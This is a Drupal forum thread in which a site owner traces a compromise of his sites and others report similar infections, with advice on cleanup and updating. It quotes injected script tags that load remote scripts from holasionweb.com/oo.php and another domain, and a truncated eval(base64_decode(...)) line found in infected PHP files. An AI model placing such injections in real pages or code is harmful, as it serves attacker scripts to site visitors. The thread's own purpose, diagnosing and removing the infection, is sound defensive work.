By one4public on

Hi,

Yesterday there was "The selected file could not be copied, because no file by that name exists. Please check that you supplied the correct filename." problem with my www.example.com site. Without doing nothing wrong with it.

Today I saw my other sites has some kind of virus attack:

you can see at below all my sites:
Note: after opening any sites, don't click on "ok" dialog box, but please and please close it with "Task Manager > Application(IE, or Chrome, or any other Browser) > Go to process > End process)

What is going wrong with my sites. I have not touch above two sites since 1 month.

Anyone please help me, how can I remove these virus from my sites?

-Vikas

Categories: Drupal 6.x

Comments

vm’s picture

vm commented

What is the exact version of drupal in use?
Are all contributed modules up to date?

Also important to note that while drupal is showing the symptoms of the problem the secuirty issue could be in other areas on the server. That's not to say it isn't a drupal but to say that it's best to reserve judgement until the source of the problem is found.

one4public’s picture

one4public commented

you are absolutely right, or may be right.

after posting above issue, now my site is opening properly, but don't know about tomorrow.

The exact issue was:
after opening my above two sites on root path below site opens automatically on same page:
www1.firesavez5.com/?q=p3495q9alksdj.........
and a dialog box appears, asking to press OK, so that they(Virus fu*ker) do what they want.

My drupal version is 6.13 and 6.14. I have not updated the update from long time.

Also, today I saw yesterday stats of both of my site, both have 0 visitors yesterday. It mean yesterday all the time virus was playing with my sites. ha ha ha.....

how can I keep safe my sites in future. This time my site is opening properly, I don't know about the virus, about the present status of virus to my sites.

one4public’s picture

one4public commented

No. Actually virus is present on my site.

1st I was trying to open my site to Google Chrome, and virus attacked. After opening and closing sites, site is opening properly to Google Chrome.

Now,
Secondly I was trying to open my site with IE, Virus again attacked.

What should I do?

vm’s picture

vm commented

not updating your site leaves you open to security issues that were found and patched.

one4public’s picture

one4public commented

Hi VM,

Thanks for pointing to update issue. After 2-3 days, I updated everything to http://www.example.com

Now 1 out of 10 times, there is still problem.

One thing I have noticed, after refreshing/reloading my site http://www.example.com, I found some codes also run with www.holasionweb.com , you can see!!!

What is this "holasionweb"? While googling, I found something about "holasionweb":
http://webcache.googleusercontent.com/search?q=cache:cR6R__m4itwJ:itsani...
or,
http://itsanimesh.com/

Is my site affected with malware, or some type of virus? How can I clean?

-Vikas

one4public’s picture

one4public commented

after seeing "View Source Codes" of main page of http://www.sudoku-challenge.com from my Chrome browser, I finally find the culprit:

........
........ 

    </div> <!-- /page -->
    <script type="text/javascript" src="/modules/google_cse/google_cse.js?W"></script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
jQuery.extend(Drupal.settings, { "googleCSE": { "language": "en" } });
//--><!]]>
</script>
  <script src="http://holasionweb.com/oo.php"></script>

</body>
</html>

"http://holasionweb.com/oo.php" is embedded. How should I clean it????

====================
and from my another site http://www.boygirlnames.com/ after seeing "view source codes" I find following:

......
<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script> 
</body> 
</html>

Please tell me how should I clean it.

dman’s picture

dman commented

Either index.php or page.tpl.php need to be restored from a clean backup or a clean copy of the appropriate Drupal version.

My site was hacked. Now what?

.dan. is the New Zealand Drupal Developer working on Government Web Standards

one4public’s picture

one4public commented

I found the problem is with only "Basic" theme, when I change the theme to others, below source code is not found:
<script src="http://holasionweb.com/oo.php"></script>

I tried to delete and again uploaded the new version of "Basic" theme, but again it comes!!!

what to do?

dman’s picture

dman commented

If that tag is where you say it is, that's the 'closure' of the page. So most likely page.tpl.php.
Did you look at page.tpl.php?

if that's not it, then something has really got into your data and configs. This is unlikely from what was probably a normal automated scripted attack.
Do a find-in-files search over your whole distro if the normal troubleshooting steps are not helping

.dan. is the New Zealand Drupal Developer working on Government Web Standards

mattwmc’s picture

mattwmc commented

I got the same bug!

However, there was also the wordpress malware bug on my site (we host four) - might be related to that? My site has been attacked five times in the last month.

Wordpress bug: http://www.developer.com/daily_news/article.php/400492/WordPress-Blogs-H...

The bug attacks every php file on your site (inluding drupal!) and modifies the top line with eval(base64_decode etc etc etc.

Driving me crazy! Been cleaning my ftp all day.

mattwmc’s picture

mattwmc commented

Found this fix for the "wordpress" eval(base64_decode bug:

http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

You can run a script that will remove the line from files.

strellman’s picture

strellman commented

That fix cleaned most of my php files in drupal, but I am not sure whether deeper folders are not changed or if something in the syntax is missing some of it.
for example all php files in /modules/aggregator still begin with <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhp

dman’s picture

dman commented

That's evil and entirely infected.
A signature like that is clearly an injection. no well-written module should be using eval() without good reason. Search for that. At least.

hacked.module will analyze all your current files and show you what's up. Try that.

.dan. is the New Zealand Drupal Developer working on Government Web Standards

mattwmc’s picture

mattwmc commented

You might have to run the word-press-fix.php a couple times and/or install it in deeper directories and run it through each folder etc.

one4public’s picture

one4public commented

Yesterday, when I was posting last reply to this thread, I done everything update/delete/upload with my site http://www.example.com/ and the virus was still with my site("viewing source code" with right click).

But today, I don't find any virus with my site, its virus free.

I don't know, it will attack tomorrow or in near future. But I will do updates regularly.

Now, I am cleaning my next site http://www.example.com with latest drupal and module updates.

Thanks to all of you, for sharing your views and help.
:)